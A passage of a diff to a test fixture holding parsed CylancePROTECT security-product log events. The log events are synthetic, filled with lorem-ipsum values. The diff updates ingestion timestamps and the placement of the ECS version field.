"message": "26-June-2017 19:42:33 very-high rnatu2805.www.home enderi \u003c\u003cmquisno\u003eodoconse 2017-6-26T7:42:33.quamqua eacommod1930.internal.lan CylancePROTECT tpersp stla uptatema Event Type: AuditLog, Event Name: fullaccess, Message: Device: uradi; SHA256: tot; Category: llamco, User: )nea (psum tasnulap", "event": { - "ingested": "2021-06-09T10:27:47.525810800Z" + "ingested": "2021-12-14T14:42:47.135062943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-7-11T2:45:07.oremipsu emeumfug4387.internal.lan CylancePROTECT uidol litani [utodita] Event Type: AuditLog, Event Name: Alert, Message: Device: untincul; SHA256: iduntu, User: )ccaeca (niamq lapariat", "event": { - "ingested": "2021-06-09T10:27:47.525815500Z" + "ingested": "2021-12-14T14:42:47.135063324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uat 2017-7-25T9:47:41.tiaec rumwrit764.www5.local CylancePROTECT edquiac urerepr [eseru] Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: etMal, External Device Type: qua, External Device Vendor ID: rsita, External Device Name: ate, External Device Product ID: ipsamvo, External Device Serial Number: onula, Zone Names: miu", "event": { - "ingested": "2021-06-09T10:27:47.525819900Z" + "ingested": "2021-12-14T14:42:47.135063703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Aug 8 4:50:15 mex2054.mail.corp CylancePROTECT Event Type:luptat, Event Name:SyslogSettingsSave, Message: Provider:ica, Source IP:10.13.66.97, User: dicta taedicta (ritt)#015", "event": { - "ingested": "2021-06-09T10:27:47.525824700Z" + "ingested": "2021-12-14T14:42:47.135068522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-8-22T11:52:50.dictasun veniamqu7284.mail.invalid CylancePROTECT nte mvel nof Event Type: AuditLog, Event Name: DeviceEdit, Message: The Device: tetur was auto assigned to the Zone: IP Address: Fake Devices, User: ()xce", "event": { - "ingested": "2021-06-09T10:27:47.525829700Z" + "ingested": "2021-12-14T14:42:47.135069004Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "6-September-2017 06:55:24 high isiu5733.api.domain etdolor \u003c\u003clupta\u003exeaco 2017-9-6T6:55:24.nvolupt oremi1485.api.localhost CylancePROTECT iosa boNemoe [onsequ] Event Type: AuditLog, Event Name: threat_quarantined, Message: SHA256: amvolupt; Reason: success, User: atisund xea (ites)", "event": { - "ingested": "2021-06-09T10:27:47.525834600Z" + "ingested": "2021-12-14T14:42:47.135069457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eri 2017-9-20T1:57:58.quunt olori416.api.test CylancePROTECT elit cidunt plica Event Type: ExploitAttempt, Event Name: Alert, Device Name: exeaco, IP Address: (10.31.190.145), Action: cancel, Process ID: 5530, Process Name: accusant.exe, User Name: onse, Violation Type: admin, Zone Names: stenatu", "event": { - "ingested": "2021-06-09T10:27:47.525839500Z" + "ingested": "2021-12-14T14:42:47.135069850Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Oct-2017 9:00:32 high nvol6269.internal.local tla \u003c\u003citem\u003enimid 4T21:00:32.dat periam126.api.host CylancePROTECT Event Name:threat_found, Threat Class:rExc, Threat Subclass:iusmo, SHA256:tame, MD5:naaliq", "event": { - "ingested": "2021-06-09T10:27:47.525844200Z" + "ingested": "2021-12-14T14:42:47.135070236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "19-October-2017 04:03:07 medium toccaec7645.www5.home psaqua \u003c\u003cullamcor\u003eitationu 2017-10-19T4:03:07.proident maliquam2147.internal.home CylancePROTECT lores ritati orisni Event Type: DeviceControl, Event Name: PolicyAdd, Device Name: estl, External Device Type: sitam, External Device Vendor ID: orem, External Device Name: rcit, External Device Product ID: llamco, External Device Serial Number: atu, Zone Names: untincul", "event": { - "ingested": "2021-06-09T10:27:47.525849Z" + "ingested": "2021-12-14T14:42:47.135070650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iuntNe 2017-11-2T11:05:41.atise tate6578.api.localdomain CylancePROTECT emvele isnost [olorem] Event Type: Threat, Event Name: PolicyAdd, Device Name: yCiceroi, IP Address: (10.252.165.146), File Name: iquamqua, Path: sit, Drive Type: rumSect, SHA256: ita, MD5: vitaed, Status: exeaco, Cylance Score: 51.523000, Found Date: mven, File Type: olorsit, Is Running: tore, Auto Run: elits, Detected By: consequa, Zone Names: turadip, Is Malware: tatevel, Is Unique To Cylance: boreetdo, Threat Classification: undeom", "event": { - "ingested": "2021-06-09T10:27:47.525853900Z" + "ingested": "2021-12-14T14:42:47.135071031Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-11-16T6:08:15.uov itlab6956.mail.local CylancePROTECT loremqu tetur amvo Event Type: siuta, Event Name: threat_changed, Device Name: ommodo, Agent Version: uptat, IP Address: (10.105.46.101, tatione), MAC Address: (01:00:5e:de:32:2c, ori), Logged On Users: (tconsect), OS: rum", "event": { - "ingested": "2021-06-09T10:27:47.525858500Z" + "ingested": "2021-12-14T14:42:47.135071418Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-1T1:10:49.ugiatn midestl1919.host CylancePROTECT cingel modocon [ipsu] Event Type: ntNeq, Event Name: Device Policy Assigned, Device Name: aUt, Agent Version: boNem, IP Address: (10.124.88.222), MAC Address: (01:00:5e:f9:78:c2), Logged On Users: (onu), OS: liquaUte", "event": { - "ingested": "2021-06-09T10:27:47.525863500Z" + "ingested": "2021-12-14T14:42:47.135071810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ria 2017-12-15T8:13:24.atDu nsec923.internal.local CylancePROTECT agnaaliq tlaboree norumet Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: mod, IP Address: (10.28.120.149), Action: deny, Process ID: 3916, Process Name: tinvolup.exe, User Name: tsed, Violation Type: inv, Zone Names: rroq", "event": { - "ingested": "2021-06-09T10:27:47.525868100Z" + "ingested": "2021-12-14T14:42:47.135072194Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-29T3:15:58.mipsamvo eiusmod3517.internal.invalid CylancePROTECT oreveri ehende [eaqueip] Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Device: olup; SHA256: labor, User: )dol (sciun metcons", "event": { - "ingested": "2021-06-09T10:27:47.525872800Z" + "ingested": "2021-12-14T14:42:47.135072583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-January-2018 22:18:32 high asnu3806.api.lan tamet \u003c\u003cperspici\u003eationul 2018/01/12T22:18:32.mquisn queips4947.mail.example CylancePROTECT molestia quir eavolup Event Type: AppControl, Event Name: Registration, Device Name: labore, IP Address: (10.165.16.231), Action: accept, Action Type: uto, File Path: iuntNequ, SHA256: esseq, Zone Names: aincidun", "event": { - "ingested": "2021-06-09T10:27:47.525877900Z" + "ingested": "2021-12-14T14:42:47.135073083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "27-January-2018 05:21:06 low oloreseo5039.test derit \u003c\u003corese\u003edolor 2018-1-27T5:21:06.econs ntexpl3889.www.home CylancePROTECT yCic nder [mdolore] Event Type: Cic, Event Name: DeviceRemove, Device Name: saqu, Agent Version: iscive, IP Address: (10.156.34.19), MAC Address: (01:00:5e:54:ab:3f), Logged On Users: (imveni), OS: ariaturE Zone Names: stquid", "event": { - "ingested": "2021-06-09T10:27:47.525882600Z" + "ingested": "2021-12-14T14:42:47.135073458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ree 2018-2-10T12:23:41.saquaea ation6657.www.home CylancePROTECT iatqu lorsi repreh Event Type: AuditLog, Event Name: Registration, Message: sitamet, User: utlabo tetur (tionula)", "event": { - "ingested": "2021-06-09T10:27:47.525887200Z" + "ingested": "2021-12-14T14:42:47.135073850Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "24-Feb-2018 7:26:15 very-high idolor3916.www5.home tas \u003c\u003cautfugi\u003etasun 24T19:26:15.duntutla ntium4450.www5.localdomain CylancePROTECT Event Name:DeviceRemove, Device Name:vol, Agent Version:oremquel, IP Address: (10.22.94.10), MAC Address: (01:00:5e:ee:e8:77), Logged On Users: (ssusci), OS:animid, Zone Names:mpo", "event": { - "ingested": "2021-06-09T10:27:47.525902800Z" + "ingested": "2021-12-14T14:42:47.135074237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llam 2018-3-11T2:28:49.cti aparia1179.www.localdomain CylancePROTECT rever ore offici Event Type: AuditLog, Event Name: DeviceEdit, Message: Devices: metco, User: acom ceroinB (nim)", "event": { - "ingested": "2021-06-09T10:27:47.525909700Z" + "ingested": "2021-12-14T14:42:47.135074613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "25-March-2018 09:31:24 medium taliqui5348.mail.localdomain loremag \u003c\u003ctcu\u003eiatqu 2018-3-25T9:31:24.inBCSedu erspi5757.local CylancePROTECT suntex iacons [occaec] Event Type: DeviceControl, Event Name: LoginSuccess, Device Name: uov, External Device Type: quaeab, External Device Vendor ID: fici, External Device Name: imve, External Device Product ID: quide, External Device Serial Number: quaU, Zone Names: undeomni", "event": { - "ingested": "2021-06-09T10:27:47.525915100Z" + "ingested": "2021-12-14T14:42:47.135075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "liquid 2018-4-8T4:33:58.enim Finibus1411.www5.corp CylancePROTECT xea taed umdolo Event Type: AuditLog, Event Name: fullaccess, Message: Policy Assigned:rroqu; Devices: dquiaco , User: nibus vitaed (ser)", "event": { - "ingested": "2021-06-09T10:27:47.525920100Z" + "ingested": "2021-12-14T14:42:47.135075388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 22 11:36:32 upt7879.www5.example CylancePROTECT Event Type:idolo, Event Name:threat_found, Device Message: Device: edolo; Zones Removed: ugiatquo; Zones Added: ntium, User: uptate lloinven (econs), Zone Names:lmolesti Device Id: apariatu", "event": { - "ingested": "2021-06-09T10:27:47.525925Z" + "ingested": "2021-12-14T14:42:47.135075798Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2018/05/07 06:39:06 erspi4926.www5.test CylancePROTECT Event Type: AppControl, incidid quin [autemv] Event Type: AppControl, Event Name: PolicyAdd, Device Name: fugits, IP Address: (10.153.34.43), Action: allow, Action Type: acommo, File Path: isi, SHA256: culpaq, Zone Names: saute", "event": { - "ingested": "2021-06-09T10:27:47.525930Z" + "ingested": "2021-12-14T14:42:47.135076243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-5-21T1:41:41.abor magnid3343.home CylancePROTECT tesseq niam [pernat] Event Type: DeviceControl, Event Name: threat_found, Device Name: gitse, External Device Type: ugitse, External Device Vendor ID: quiineav, External Device Name: billoinv, External Device Product ID: sci, External Device Serial Number: col, Zone Names: obea", "event": { - "ingested": "2021-06-09T10:27:47.525935200Z" + "ingested": "2021-12-14T14:42:47.135076632Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Jun-2018 8:44:15 high uptatem4483.localhost inrepr \u003c\u003cmol\u003eumdolors 4T20:44:15.dolori asperna7623.www.home CylancePROTECT Event Name:ThreatUpdated, Message: Device:dexewas auto assigned to Zone:tat, User:onproide", "event": { - "ingested": "2021-06-09T10:27:47.525940100Z" + "ingested": "2021-12-14T14:42:47.135077019Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riosa 2018-6-19T3:46:49.tNe pisc3553.internal.home CylancePROTECT rautod olest eataev Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: ritati, IP Address: (10.43.110.203), Action: allow, Process ID: 1359, Process Name: nim.exe, User Name: ame, Violation Type: amvolu, Zone Names: mip", "event": { - "ingested": "2021-06-09T10:27:47.525944800Z" + "ingested": "2021-12-14T14:42:47.135077405Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-July-2018 10:49:23 medium iame4937.local tiumd \u003c\u003cntmoll\u003emexer 2018/07/03T10:49:23.estla uipexe7153.api.corp CylancePROTECT saqu remips illoi Event Type: AppControl, Event Name: ZoneAdd, Device Name: abori, IP Address: (10.127.20.244), Action: block, Action Type: uelauda, File Path: ema, SHA256: odi, Zone Names: ptatems", "event": { - "ingested": "2021-06-09T10:27:47.525949400Z" + "ingested": "2021-12-14T14:42:47.135077801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nde 2018-7-17T5:51:58.abillo undeom845.www5.example CylancePROTECT quaer eetdo [tlab] Event Type: ScriptControl, Event Name: LoginSuccess, Device Name: liq, File Path: seddoeiu, Interpreter: nse, Interpreter Version: 1.3421, Zone Names: quira, User Name: tassita", "event": { - "ingested": "2021-06-09T10:27:47.525953900Z" + "ingested": "2021-12-14T14:42:47.135078204Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Aug 1 12:54:32 atis6201.internal.invalid CylancePROTECT Event Type:nisiut, Event Name:threat_changed, Message: Device:quirawas auto assigned to Zone:rror, User:tatema", "event": { - "ingested": "2021-06-09T10:27:47.525958400Z" + "ingested": "2021-12-14T14:42:47.135078609Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "15-August-2018 07:57:06 low tperspic7591.www.lan ict \u003c\u003csquirati\u003etem 2018-8-15T7:57:06.mestq ura675.mail.localdomain CylancePROTECT eleumiu uei Nequepo Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: seddo, External Device Type: uam, External Device Vendor ID: orumSec, External Device Name: nisiuta, External Device Product ID: stiaecon, External Device Serial Number: dol, Zone Names: sumquiad", "event": { - "ingested": "2021-06-09T10:27:47.525963100Z" + "ingested": "2021-12-14T14:42:47.135078993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "29-August-2018 14:59:40 high oeni179.api.localhost gna \u003c\u003cisiutali\u003elumqu 2018-8-29T2:59:40.onulamco ons5050.mail.test CylancePROTECT unt tass [tiumdol] Event Type: Threat, Event Name: threat_quarantined, Device Name: mquiad, IP Address: (10.48.209.115), File Name: psa, Path: nculpaq, Drive Type: reseosqu, SHA256: sequat, MD5: lor, Status: ccaec, Cylance Score: 75.498000, Found Date: ommo, File Type: iame, Is Running: laudanti, Auto Run: umiurer, Detected By: rere, Zone Names: cta, Is Malware: aevi, Is Unique To Cylance: uameiusm, Threat Classification: adm", "event": { - "ingested": "2021-06-09T10:27:47.525967800Z" + "ingested": "2021-12-14T14:42:47.135079386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-September-2018 22:02:15 medium mnihilm1903.internal.host ditautf \u003c\u003citametc\u003eori 2018-9-12T10:02:15.uamqu olori4584.mail.domain CylancePROTECT sunt autfugit emUte Event Type: AuditLog, Event Name: ThreatUpdated, Message: Zone: nturmag; Policy: tura; Value: osquirat, User: equat aliquid (usantiu)", "event": { - "ingested": "2021-06-09T10:27:47.525973400Z" + "ingested": "2021-12-14T14:42:47.135079768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "27-Sep-2018 5:04:49 very-high trudex4443.www5.localhost lor \u003c\u003cxplic\u003eeseruntm 27T05:04:49.lpaquiof oloreeu7597.mail.home CylancePROTECT Event Name:PolicyAdd, Device Name:nula, Agent Version:quiacons, IP Address: (10.7.99.47), MAC Address: (01:00:5e:e8:41:ae), Logged On Users: (evolupta), OS:teturadi, Zone Names:ditau", "event": { - "ingested": "2021-06-09T10:27:47.525978100Z" + "ingested": "2021-12-14T14:42:47.135080167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hend 2018-10-11T12:07:23.eacommo ueip5847.api.test CylancePROTECT umd sciveli [dolorem] Event Type: sed, Event Name: Device Updated, Threat Class: Nemoenim, Threat Subclass: usm, SHA256: labori, MD5: porai", "event": { - "ingested": "2021-06-09T10:27:47.525982900Z" + "ingested": "2021-12-14T14:42:47.135080548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ostr 2018-10-25T7:09:57.sec uid3520.www.home CylancePROTECT eFini ectob [mrema] Event Type: ScriptControl, Event Name: SystemSecurity, Device Name: prehend, File Path: eufug, Interpreter: roquisq, Interpreter Version: 1.989 (est), Zone Names: civelits, User Name: ici", "event": { - "ingested": "2021-06-09T10:27:47.525987600Z" + "ingested": "2021-12-14T14:42:47.135080935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 9 2:12:32 miurerep3693.mail.localhost CylancePROTECT Event Type:iduntu, Event Name:SyslogSettingsSave, Device Name:inibusB, Zone Names:nostrud", "event": { - "ingested": "2021-06-09T10:27:47.525992400Z" + "ingested": "2021-12-14T14:42:47.135081312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 23 9:15:06 esse3795.www.host CylancePROTECT Event Type:pariatur, Event Name:SyslogSettingsSave, Message: The Device:imaveniawas auto assigned to Zone:expli, User:ugiat", "event": { - "ingested": "2021-06-09T10:27:47.525997100Z" + "ingested": "2021-12-14T14:42:47.135081704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "bore 2018-12-7T4:17:40.ptate teir7585.www5.localdomain CylancePROTECT quu xeac [llitanim] Event Type: AuditLog, Event Name: SystemSecurity, Message: Devices: oreverit, User: scip Finibus (Utenimad)", "event": { - "ingested": "2021-06-09T10:27:47.526001600Z" + "ingested": "2021-12-14T14:42:47.135082095Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 21 11:20:14 hen1901.example CylancePROTECT Event Type:ali, Event Name:SyslogSettingsSave, Device Name:quunt, External Device Type:itasp, External Device Vendor ID:qui, External Device Name:equeporr, External Device Product ID:met, External Device Serial Number:volup, Zone Names:ptate, Device Id: entsu, Policy Name: conse", "event": { - "ingested": "2021-06-09T10:27:47.526006700Z" + "ingested": "2021-12-14T14:42:47.135082600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 5 6:22:49 mag4267.www.test CylancePROTECT Event Type:atura, Event Name:Alert, Device Message: Device: oreeu User: ),nvo (iamqui tassita Zone Names: colabori Device Id: imidestl", "event": { - "ingested": "2021-06-09T10:27:47.526011300Z" + "ingested": "2021-12-14T14:42:47.135082990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-1-19T1:25:23.minimve serrorsi1096.www5.localdomain CylancePROTECT lamco cit [siar] Event Type: AuditLog, Event Name: ZoneAddDevice, Message: The Device: reetdo was auto assigned to the Zone: IP Address: Fake Devices, User: ()ever", "event": { - "ingested": "2021-06-09T10:27:47.526016100Z" + "ingested": "2021-12-14T14:42:47.135083496Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quiav 2019-2-2T8:27:57.mse prehen4807.mail.invalid CylancePROTECT liqua ariatur [labo] Event Type: DeviceControl, Event Name: SystemSecurity, Device Name: remq, External Device Type: unt, External Device Vendor ID: tla, External Device Name: arch, External Device Product ID: lite, External Device Serial Number: ugia, Zone Names: meum", "event": { - "ingested": "2021-06-09T10:27:47.526020700Z" + "ingested": "2021-12-14T14:42:47.135084149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Feb 17 3:30:32 nvolupta126.www.domain CylancePROTECT Event Type:quas, Event Name:threat_found, Device Name:orp, File Path:ender, Interpreter:dico, Interpreter Version:1.5848, Zone Names:Utenima, User Name: olore", "event": { - "ingested": "2021-06-09T10:27:47.526025500Z" + "ingested": "2021-12-14T14:42:47.135084658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-March-2019 10:33:06 medium radip4253.www.corp gna \u003c\u003cici\u003equamnih 2019-3-3T10:33:06.asnulap yCiceroi5998.mail.home CylancePROTECT inc tect uiad Event Type: DeviceControl, Event Name: DeviceRemove, Device Name: roinBCSe, External Device Type: maperiam, External Device Vendor ID: mSec, External Device Name: smoditem, External Device Product ID: tatisetq, External Device Serial Number: uidolo, Zone Names: umdolore", "event": { - "ingested": "2021-06-09T10:27:47.526030500Z" + "ingested": "2021-12-14T14:42:47.135085266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-3-17T5:35:40.abori sit1400.www.lan CylancePROTECT ames amni [tatio] Event Type: AuditLog, Event Name: ZoneAdd, Message: Zone: ntsunti; Policy: borios; Value: ani, User: uid idatat (onev)", "event": { - "ingested": "2021-06-09T10:27:47.526035200Z" + "ingested": "2021-12-14T14:42:47.135085659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iosamni 2019-4-1T12:38:14.idu sis3986.internal.lan CylancePROTECT tsedquia its umdolor Event Type: isiu, Event Name: Device Policy Assigned, Device Name: mmodi, Agent Version: snostr, IP Address: (10.232.90.3), MAC Address: (01:00:5e:e6:a6:a2), Logged On Users: (midestl), OS: nci", "event": { - "ingested": "2021-06-09T10:27:47.526039900Z" + "ingested": "2021-12-14T14:42:47.135086058Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hilmole 2019-4-15T7:40:49.sequ sectetu7182.localdomain CylancePROTECT dolor lorumwri [amnihil] Event Type: orissus, Event Name: Device Updated, uido", "event": { - "ingested": "2021-06-09T10:27:47.526044500Z" + "ingested": "2021-12-14T14:42:47.135086495Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-4-29T2:43:23.itse officiad4982.www5.domain CylancePROTECT lumqui quiavolu [upta] Event Type: AuditLog, Event Name: ZoneAdd, Message: Device: umtota; User: etdolore magnaa (sumquiad)", "event": { - "ingested": "2021-06-09T10:27:47.526049300Z" + "ingested": "2021-12-14T14:42:47.135086888Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-5-13T9:45:57.Duisa consequa1486.internal.localdomain CylancePROTECT aevitaed byCic [leumiur] Event Type: ptatemse, Event Name: pechange, Threat Class: quaeratv, Threat Subclass: involu, SHA256: tobeata, MD5: nesciun", "event": { - "ingested": "2021-06-09T10:27:47.526055500Z" + "ingested": "2021-12-14T14:42:47.135087276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onorumet 2019-5-28T4:48:31.ptatema eavolup6981.www5.example CylancePROTECT psaquaea rchit psumq Event Type: DeviceControl, Event Name: threat_changed, Device Name: lum, External Device Type: xerc, External Device Vendor ID: ctetura, External Device Name: msequ, External Device Product ID: nvol, External Device Serial Number: enimadmi, Zone Names: tateveli", "event": { - "ingested": "2021-06-09T10:27:47.526060700Z" + "ingested": "2021-12-14T14:42:47.135087661Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-6-11T11:51:06.oremip its6443.mail.example CylancePROTECT natuserr ostrudex [nse] Event Type: miurere, Event Name: fullaccess, Device Name: tlabo, Agent Version: tatemse, IP Address: (10.139.80.71), MAC Address: (01:00:5e:bc:c1:21), Logged On Users: (orem), OS: eniamqui", "event": { - "ingested": "2021-06-09T10:27:47.526065400Z" + "ingested": "2021-12-14T14:42:47.135088056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "25-June-2019 18:53:40 high tnulapa7580.www.domain adeser \u003c\u003cuasiarc\u003edoeiu 2019-6-25T6:53:40.onsectet dentsunt6061.www5.home CylancePROTECT tobeata imven onnumqua Event Type: quioff, Event Name: SyslogSettingsSave, Device Names: (upt), Policy Name: atatnonp, User: nvol dtemp (mquis)", "event": { - "ingested": "2021-06-09T10:27:47.526074100Z" + "ingested": "2021-12-14T14:42:47.135088447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10-July-2019 01:56:14 medium midest133.www5.example tocca \u003c\u003corsitvol\u003entor 2019-7-10T1:56:14.oinBCSed oid218.api.invalid CylancePROTECT roquisqu ariat midestl Event Type: AuditLog, Event Name: SyslogSettingsSave, Message: mcorpori, User: mqu pteursi (orsitam)", "event": { - "ingested": "2021-06-09T10:27:47.526079400Z" + "ingested": "2021-12-14T14:42:47.135088852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "totamre 2019-7-24T8:58:48.rpo velites4233.internal.home CylancePROTECT uisaute uun end Event Type: odocons, Event Name: Alert, Threat Class: asp, Threat Subclass: dexercit, SHA256: amn, MD5: itessequ", "event": { - "ingested": "2021-06-09T10:27:47.526084100Z" + "ingested": "2021-12-14T14:42:47.135089235Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "7-August-2019 16:01:23 low sumd3215.test aUtenima \u003c\u003cturQuis\u003etaevi 2019-8-7T4:01:23.uames tconsec7604.corp CylancePROTECT laboree udantiu [itametco] Event Type: Threat, Event Name: Alert, Device Name: stiaecon, IP Address: (10.223.246.244), File Name: itl, Path: ttenb, Drive Type: olor, SHA256: quiav, MD5: gna, Status: Nem, Cylance Score: 105.845000, Found Date: lors, File Type: oluptat, Is Running: enimad, Auto Run: tis, Detected By: qua, Zone Names: con, Is Malware: tore, Is Unique To Cylance: sequatD, Threat Classification: ercitati", "event": { - "ingested": "2021-06-09T10:27:47.526088700Z" + "ingested": "2021-12-14T14:42:47.135089626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "21-Aug-2019 11:03:57 high oeiusmo5035.api.local tconse \u003c\u003crem\u003etseddoei 21T23:03:57.teursint etMa3452.www5.test CylancePROTECT Event Name:threat_found, Device Name:nturmag, File Path:uredol, Interpreter:maliqua, Interpreter Version:1.4613, Zone Names:mquia, User Name: omnisi, Device Id: etMalor, Policy Name: mco", "event": { - "ingested": "2021-06-09T10:27:47.526093300Z" + "ingested": "2021-12-14T14:42:47.135090018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "5-September-2019 06:06:31 high taspe1205.mail.domain cti \u003c\u003commodoc\u003ense 2019-9-5T6:06:31.mveniam tuser2694.internal.invalid 